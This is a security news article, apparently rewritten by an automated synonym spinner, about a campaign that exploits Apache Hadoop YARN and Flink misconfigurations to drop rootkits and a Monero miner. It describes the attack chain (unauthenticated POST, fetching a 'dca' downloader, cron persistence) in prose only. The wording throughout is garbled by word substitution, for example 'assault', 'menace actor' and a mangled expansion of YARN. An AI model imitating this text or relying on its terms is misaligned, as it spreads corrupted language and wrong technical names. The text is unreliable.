Cybersecurity researchers have recognized a brand new assault that exploits misconfigurations in Apache Hadoop and Flink to deploy cryptocurrency miners inside focused environments.
“This assault is especially intriguing because of the attacker’s use of packers and rootkits to hide the malware,” Aqua safety researchers Nitzan Yaakov and Assaf Morag stated in an evaluation revealed earlier this week. “The malware deletes contents of particular directories and modifies system configurations to evade detection.”
The an infection chain focusing on Hadoop leverages a misconfiguration within the YARN’s (But One other Useful resource Negotiator) ResourceManager, which is answerable for monitoring assets in a cluster and scheduling purposes.
Particularly, the misconfiguration might be exploited by an unauthenticated, distant menace actor to execute arbitrary code by way of a crafted HTTP request, topic to the privileges of the consumer on the node the place the code is executed.
The assaults aimed toward Apache Flink, likewise, take purpose at a misconfiguration that allows a distant attacker to realize code execution sans any authentication.
These misconfigurations aren’t novel and have been exploited prior to now by financially motivated teams like TeamTNT, which is thought for its historical past of focusing on Docker and Kubernetes environments for the aim of cryptojacking and different malicious actions.
However what makes the most recent set of assaults noteworthy is using rootkits to cover crypto mining processes after acquiring an preliminary foothold into Hadoop and Flink purposes.
“The attacker sends an unauthenticated request to deploy a brand new software,” the researchers defined. “The attacker is ready to run a distant code by sending a POST request to the YARN, requesting to launch the brand new software with the attacker’s command.”
The command is purpose-built to clear the /tmp listing of all current content material, fetch a file referred to as “dca” from a distant server, and execute it, adopted by deleting all information within the /tmp listing as soon as once more.
The executed payload is a packed ELF binary that acts as a downloader to retrieve two rootkits and a Monero cryptocurrency miner binary. It is price declaring that varied adversaries, together with Kinsing, have resorted to using rootkits to hide the presence of the mining course of.
To attain persistence, a cron job is created to obtain and execute a shell script that deploys the ‘dca’ binary. Additional evaluation of the menace actor’s infrastructure reveals that the staging server used to fetch the downloader was registered on October 31, 2023.
As mitigations, it is advisable that organizations deploy agent-based safety options to detect cryptominers, rootkits, obfuscated or packed binaries, in addition to different suspicious runtime behaviors.